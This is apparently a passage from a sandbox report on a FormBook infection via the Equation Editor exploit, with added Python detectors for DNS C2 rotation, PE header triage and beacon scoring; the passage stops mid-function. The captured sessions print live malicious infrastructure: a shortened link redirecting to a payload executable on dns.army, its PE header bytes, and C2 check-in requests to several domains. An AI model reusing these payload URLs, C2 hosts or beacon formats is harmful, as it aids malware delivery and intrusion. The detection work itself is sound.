Feb 23, 2021 10:27:26.359603882 CET | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | www.overseaexpert.com | overseaexpert.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 10:27:26.359603882 CET | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | overseaexpert.com | | 191.96.163.202 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:31.838535070 CET | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | www.oryanomer.com | oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 10:27:31.838535070 CET | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com | | 52.57.196.177 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:31.838535070 CET | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com | | 18.195.132.44 | A (IP address) | IN (0x0001)
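Read together, the query and answer tables show the two stages of this infection on the wire. First the exploited process resolves ow.ly (the second ow.ly query 60 ms later carries the same transaction ID 0xd44b, so it is a resolver retry, not a second lookup) and then the payload host under dns.army. Then, after 67 seconds of DNS silence, the injected explorer.exe walks through five unrelated www. domains, one lookup every 5 to 6 seconds, never re-resolving any of them, and one of the five (www.evoslancete.com) does not resolve at all. That cadence is what a DNS-log detection for FormBook-style C2 rotation should key on, and it is distinct from a browser page load, which also fans out to many names but in sub-second bursts. The following Python is an added example and not part of the Joe Sandbox report: the records are transcribed from the two tables above, and the thresholds (four or more distinct names, 3 to 10 seconds apart) are assumptions chosen to fit this capture.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List


@dataclass
class DnsQuery:
    ts: datetime
    src: str
    name: str
    outcome: str  # one-line summary of the matching DNS Answers row


def parse_ts(s: str) -> datetime:
    """Joe Sandbox prints nanoseconds and a zone name; strptime takes at most microseconds."""
    base, frac = s.replace(" CET", "").rsplit(".", 1)
    return datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


# Transcribed from the DNS Queries / DNS Answers tables of this report (client 192.168.2.22).
QUERIES: List[DnsQuery] = [
    DnsQuery(parse_ts(t), "192.168.2.22", n, o)
    for t, n, o in [
        ("Feb 23, 2021 10:26:02.297571898 CET", "ow.ly", "5 A records"),
        ("Feb 23, 2021 10:26:02.357660055 CET", "ow.ly", "5 A records (retry, same ID 0xd44b)"),
        ("Feb 23, 2021 10:26:02.863348007 CET", "algreenstdykeghestqw.dns.army", "103.140.251.164"),
        ("Feb 23, 2021 10:27:09.647248030 CET", "www.evoslancete.com", "NXDOMAIN"),
        ("Feb 23, 2021 10:27:14.720684052 CET", "www.fashionwatchesstore.com", "104.21.61.250, 172.67.217.64"),
        ("Feb 23, 2021 10:27:20.293311119 CET", "www.athara-kiano.com", "CNAME -> 103.251.44.218"),
        ("Feb 23, 2021 10:27:26.285974979 CET", "www.overseaexpert.com", "CNAME -> 191.96.163.202"),
        ("Feb 23, 2021 10:27:31.759540081 CET", "www.oryanomer.com", "CNAME -> 52.57.196.177, 18.195.132.44"),
    ]
]


def find_rotation_bursts(queries: List[DnsQuery], min_domains: int = 4,
                         min_gap: float = 3.0, max_gap: float = 10.0) -> List[Dict]:
    """Flag runs of >= min_domains *distinct* names from one client, each lookup
    min_gap..max_gap seconds after the previous one. min_gap is what separates a
    beacon rotation from a page load; the thresholds are assumptions, tune per site."""
    bursts: List[Dict] = []
    by_src: Dict[str, List[DnsQuery]] = {}
    for q in sorted(queries, key=lambda q: q.ts):
        by_src.setdefault(q.src, []).append(q)

    def flush(run: List[DnsQuery], quiet_before: float) -> None:
        if len(run) < min_domains:
            return
        gaps = [(b.ts - a.ts).total_seconds() for a, b in zip(run, run[1:])]
        bursts.append({
            "src": run[0].src,
            "start": run[0].ts,
            "quiet_before_s": quiet_before,  # silence between the previous lookup and the burst
            "domains": [q.name for q in run],
            "mean_gap_s": sum(gaps) / len(gaps),
            "unresolved": [q.name for q in run if q.outcome == "NXDOMAIN"],
        })

    for qs in by_src.values():
        run, quiet = [qs[0]], 0.0
        for prev, cur in zip(qs, qs[1:]):
            gap = (cur.ts - prev.ts).total_seconds()
            if min_gap <= gap <= max_gap and cur.name not in {q.name for q in run}:
                run.append(cur)
            else:
                flush(run, quiet)   # run broken: too fast, too slow, or a repeated name
                run, quiet = [cur], gap
        flush(run, quiet)
    return bursts


if __name__ == "__main__":
    for b in find_rotation_bursts(QUERIES):
        print(f"{b['src']} at {b['start']:%H:%M:%S}: {len(b['domains'])} domains, "
              f"{b['mean_gap_s']:.1f} s apart after {b['quiet_before_s']:.0f} s of silence; "
              f"unresolved: {b['unresolved']}")
```

On this capture the detector reports a single burst of five domains about 5.5 s apart, preceded by roughly 67 s of silence, with www.evoslancete.com unresolved; the ow.ly retry and the dns.army lookup fall below min_gap and are left alone. The quiet interval and the unresolved member are worth keeping in the alert, since a name the malware tries anyway after NXDOMAIN is a strong sign that the list is baked into the sample rather than derived from user activity.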

HTTP Request Dependency Graph

• ow.ly
• algreenstdykeghestqw.dns.army
• www.fashionwatchesstore.com
• www.athara-kiano.com
• www.overseaexpert.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 54.67.57.56 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:26:02.626580000 CET | 0 | OUT | GET /omCE30rxT5x HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: ow.ly
    Connection: Keep-Alive
Feb 23, 2021 10:26:02.840116024 CET | 1 | IN | HTTP/1.1 301 Moved Permanently
    Location: http://algreenstdykeghestqw.dns.army/receipat/winlog.exe?platform=hootsuite
    Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
    X-Frame-Options: DENY
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    X-Permitted-Cross-Domain-Policies: master-only
    Date: Tue, 23 Feb 2021 09:26:02 GMT
    Connection: close
    Content-Length: 0
    X-Pool: owly_web


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 103.140.251.164 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:26:03.166852951 CET | 2 | OUT | GET /receipat/winlog.exe?platform=hootsuite HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Connection: Keep-Alive
    Host: algreenstdykeghestqw.dns.army
Feb 23, 2021 10:26:03.389307976 CET | 3 | IN | HTTP/1.1 200 OK
    Date: Tue, 23 Feb 2021 09:26:00 GMT
    Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
    Last-Modified: Tue, 23 Feb 2021 07:55:07 GMT
    ETag: "35218-5bbfc3ca9d9e8"
    Accept-Ranges: bytes
    Content-Length: 217624
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5f d7 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 78 02 00 00 04 00 00 86 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 03 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 80 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 7c 09 00 00 00 80 03 00 00 0a 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1)PGPGPG*_PGPFIPG*_PGswPG.VAPGRichPGPEL_$_fx4@@D|.textef `.rdataj@@.dataXU~@.ndata.rsrc|@@
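Session 1 is the payload fetch. The ow.ly shortener (session 0) answered a 301 that sent Equation Editor straight to a .exe; the Apache host then returned Content-Type application/x-msdownload with a body that begins with MZ, and the first field of its ETag, 35218, is the file size in hex (0x35218 = 217624, equal to Content-Length), so the response carried the whole file. The first 0x288 bytes of the Data Raw dump already contain every PE header field a triage needs. The parser below is an added example and not part of the report: the bytes are transcribed from the dump above, with the DOS stub and Rich header between 0x40 and 0xc7 zero-filled because the parser does not read them, and the NSIS heuristic (an uninitialized section named .ndata) is an assumption stated in the code.

```python
import struct
from datetime import datetime, timezone
from typing import Dict, List

# Transcribed from the Data Raw dump of session 1 (the body of /receipat/winlog.exe).
# Only the ranges the parser reads are copied verbatim: the DOS header (0x00-0x3f) and
# the PE signature at 0xc8 through the end of the section table (0x288). The DOS stub
# and Rich header in between (0x40-0xc7) are zero-filled; nothing below reads them.
CAPTURED_HEAD = (
    bytes.fromhex("4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00")
    + bytes(28) + bytes.fromhex("c8 00 00 00")          # e_lfanew at 0x3c
    + bytes(0xC8 - 0x40)                                  # DOS stub + Rich header, zero-filled
    # "PE\0\0" + IMAGE_FILE_HEADER: machine, #sections, timestamp, ..., optional size, characteristics
    + bytes.fromhex("50 45 00 00 4c 01 05 00 5f d7 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01")
    # IMAGE_OPTIONAL_HEADER32: standard and Windows-specific fields (96 bytes) ...
    + bytes.fromhex(
        "0b 01 06 00 00 66 00 00 00 78 02 00 00 04 00 00 86 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00"
        "00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00"
        "00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00"
    )
    # ... and 16 data directories: export (empty), import, resource, 9 empty, IAT, 3 empty (128 bytes)
    + bytes.fromhex("00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 03 00 7c 09 00 00")
    + bytes(72) + bytes.fromhex("00 80 00 00 9c 02 00 00") + bytes(24)
    # five IMAGE_SECTION_HEADER entries, 40 bytes each
    + bytes.fromhex(
        "2e 74 65 78 74 00 00 00 ad 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00"
        "00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60"
        "2e 72 64 61 74 61 00 00 80 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00"
        "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40"
        "2e 64 61 74 61 00 00 00 58 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00"
        "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0"
        "2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00"
        "00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0"
        "2e 72 73 72 63 00 00 00 7c 09 00 00 00 80 03 00 00 0a 00 00 00 84 00 00"
        "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40"
    )
)

# Response headers of session 1, as captured.
SESSION1_HEADERS = {
    "Content-Type": "application/x-msdownload",
    "Content-Length": "217624",
    "ETag": '"35218-5bbfc3ca9d9e8"',
    "Server": "Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38",
}

SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe_header(data: bytes) -> Dict:
    """Parse the DOS header, COFF header, PE32 optional header and section table of an image prefix."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ magic")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    machine, nsect, stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic != 0x10B:
        raise ValueError(f"only PE32 handled here, magic=0x{magic:x}")
    (entry,) = struct.unpack_from("<I", data, opt + 16)        # AddressOfEntryPoint
    (image_base,) = struct.unpack_from("<I", data, opt + 28)   # ImageBase (PE32 layout)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)    # 2 = Windows GUI, 3 = console
    sections: List[Dict] = []
    table = opt + opt_size
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, _, _, _, _, schars = struct.unpack_from(SECTION_FMT, data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": rawsize, "raw_ptr": rawptr, "characteristics": schars})
    return {"machine": machine, "characteristics": chars,
            "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc),
            "entry_point": entry, "image_base": image_base, "subsystem": subsystem, "sections": sections}


def looks_like_nsis(info: Dict) -> bool:
    """Heuristic (assumption): NSIS installer stubs carry an uninitialized data section named .ndata."""
    return any(s["name"] == ".ndata" for s in info["sections"])


def classify_download(headers: Dict[str, str], body: bytes) -> Dict[str, bool]:
    """Cheap triage of an HTTP download before any parsing."""
    etag = headers.get("ETag", '"0-0"').strip('"')
    # Apache's default FileETag (MTime Size) emits "<size hex>-<mtime hex>", so the first
    # field agrees with Content-Length when the body was served in full.
    return {
        "executable_mime": headers.get("Content-Type", "").lower() == "application/x-msdownload",
        "mz_body": body[:2] == b"MZ",
        "etag_size_matches_length": int(etag.split("-")[0], 16) == int(headers.get("Content-Length", "0")),
    }


if __name__ == "__main__":
    print(classify_download(SESSION1_HEADERS, CAPTURED_HEAD))
    info = parse_pe_header(CAPTURED_HEAD)
    print(f"machine=0x{info['machine']:x} entry=0x{info['entry_point']:x} "
          f"built={info['timestamp']:%Y-%m-%d %H:%M:%S}Z nsis={looks_like_nsis(info)}")
    for s in info["sections"]:
        print(f"  {s['name']:<7} va=0x{s['virtual_address']:06x} raw=0x{s['raw_size']:05x} chars=0x{s['characteristics']:08x}")
```

Run against the captured bytes, the parser recovers an i386 PE32 GUI executable with five sections; .ndata has no raw data and characteristics 0xc0000080 (uninitialized, readable, writable), which is the layout an NSIS stub uses for its runtime heap. If that heuristic holds, two caveats follow: the TimeDateStamp (2020-08-01 UTC) belongs to the precompiled NSIS stub and does not date the campaign, and the 217624-byte file is a wrapper whose real payload sits in the NSIS overlay after the last section, so static analysis has to continue past the headers shown here.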


Session ID: 2
Source IP: 192.168.2.22
Source Port: 49169
Destination IP: 104.21.61.250
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Feb 23, 2021 10:27:14.847470045 CET
kBytes transferred: 233
Direction: OUT
Data: GET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1
Host: www.fashionwatchesstore.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Feb 23, 2021 10:27:15.275433064 CET
kBytes transferred: 234
Direction: IN
Data: HTTP/1.1 401.1 Unauthorized
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:27:15 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: __cfduid=d3952bf084d888117c82a1d2dca71090e1614072434; expires=Thu, 25-Mar-21 09:27:14 GMT; path=/; domain=.fashionwatchesstore.com; HttpOnly; SameSite=Lax
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        cf-request-id: 086fcfe8bf00004e138929f000000001
                                                                                                                                                                                                        Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1hpP4drIbnTPup7R%2BneVNCvn3ziHhYEXy7Bfs5HWyLnKg3AuVrK25htuzaIQ5yjDZzGHpeOeu%2BasfhUsOTaLLpPnHmavrF9L7rSfcWPR4kjZaxJXalXOfrRBmnE%3D"}],"max_age":604800}
                                                                                                                                                                                                        NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 625fe8edf9f54e13-FRA
                                                                                                                                                                                                        Data Raw: 36 35 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e e8 8a 92 e6 9e 9c e8 a7 86 e9 a2 91 2f e5 a4 a9 e5 a4 a9 e7 9c 8b e7 89 87 e5 a4 a9 e5 a4 a9 e7 88 bd 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0d 0a 2a 7b 6d 61 72 67 69 6e 3a 30 70 78 20 61 75 74 6f 3b 7d 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 3f 33 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 
44 59 3e 3c
                                                                                                                                                                                                        Data Ascii: 65c<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>/</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no"><STYLE type="text/css"> *{margin:0px auto;} BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE><script type="text/javascript" src="/tj.js?3"></script></HEAD><BODY><


Session ID: 3
Source IP: 192.168.2.22
Source Port: 49170
Destination IP: 103.251.44.218
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Feb 23, 2021 10:27:20.771933079 CET
kBytes transferred: 236
Direction: OUT
Data: GET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1
Host: www.athara-kiano.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Feb 23, 2021 10:27:21.240080118 CET
kBytes transferred: 236
Direction: IN
Data: HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                        X-Redirect-By: WordPress
                                                                                                                                                                                                        Location: https://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:27:21 GMT
                                                                                                                                                                                                        Server: LiteSpeed


Session ID: 4
Source IP: 192.168.2.22
Source Port: 49171
Destination IP: 191.96.163.202
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Feb 23, 2021 10:27:26.555535078 CET
kBytes transferred: 237
Direction: OUT
Data: GET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1
Host: www.overseaexpert.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Feb 23, 2021 10:27:26.751426935 CET
kBytes transferred: 238
Direction: IN
Data: HTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:27:26 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 73 61 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nsag/ was not found on this server.</p></body></html>
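The three sessions above show one check-in shape repeated by explorer.exe against three different hosts, each answering differently (401, 301, 404). As an added example, not part of the Joe Sandbox report, the following Python scores captured HTTP requests against the traits visible in those sessions and then groups the survivors by path and trailing id to surface the host rotation. The record layout, function names and the three-hit threshold are assumptions of mine; the three sample requests are re-typed from the sessions above and the firefox.exe request is constructed for contrast.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

# Added example, not part of the Joe Sandbox report. The record layout,
# function names and thresholds are my own assumptions; the sandbox exposes
# no such API. Sample data is re-typed from the three sessions above.

@dataclass
class HttpRequest:
    process: str            # image path of the process that opened the socket
    host: str               # Host header
    method: str
    uri: str                # request target, e.g. "/nsag/?SFN=...&cBb=LtD0g"
    headers: dict
    body: bytes
    status: Optional[int] = None   # response status, if the server answered

# Processes that have no business speaking HTTP on their own; a hit here is
# the "system process connects to network" injection indicator from the report.
SYSTEM_PROCESSES = {r"c:\windows\explorer.exe", r"c:\windows\system32\svchost.exe"}
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")
SHORT_ID = re.compile(r"^[A-Za-z0-9]{3,8}$")


def query_pairs(uri: str) -> list:
    """Split the query string by hand: parse_qsl would turn '+' into ' ' and
    the base64 blob must survive byte-for-byte."""
    query = urlsplit(uri).query
    return [tuple(p.partition("=")[::2]) for p in query.split("&") if p]


def beacon_reasons(req: HttpRequest) -> list:
    """Indicators that make `req` look like a FormBook check-in. Each heuristic
    is taken from the traffic captured on this page, not from a protocol spec,
    so treat the shape as an assumption that must be re-validated per sample."""
    reasons = []
    path = urlsplit(req.uri).path
    segments = [s for s in path.split("/") if s]
    pairs = query_pairs(req.uri)
    hdrs = {k.lower(): v for k, v in req.headers.items()}

    if req.process.lower() in SYSTEM_PROCESSES:
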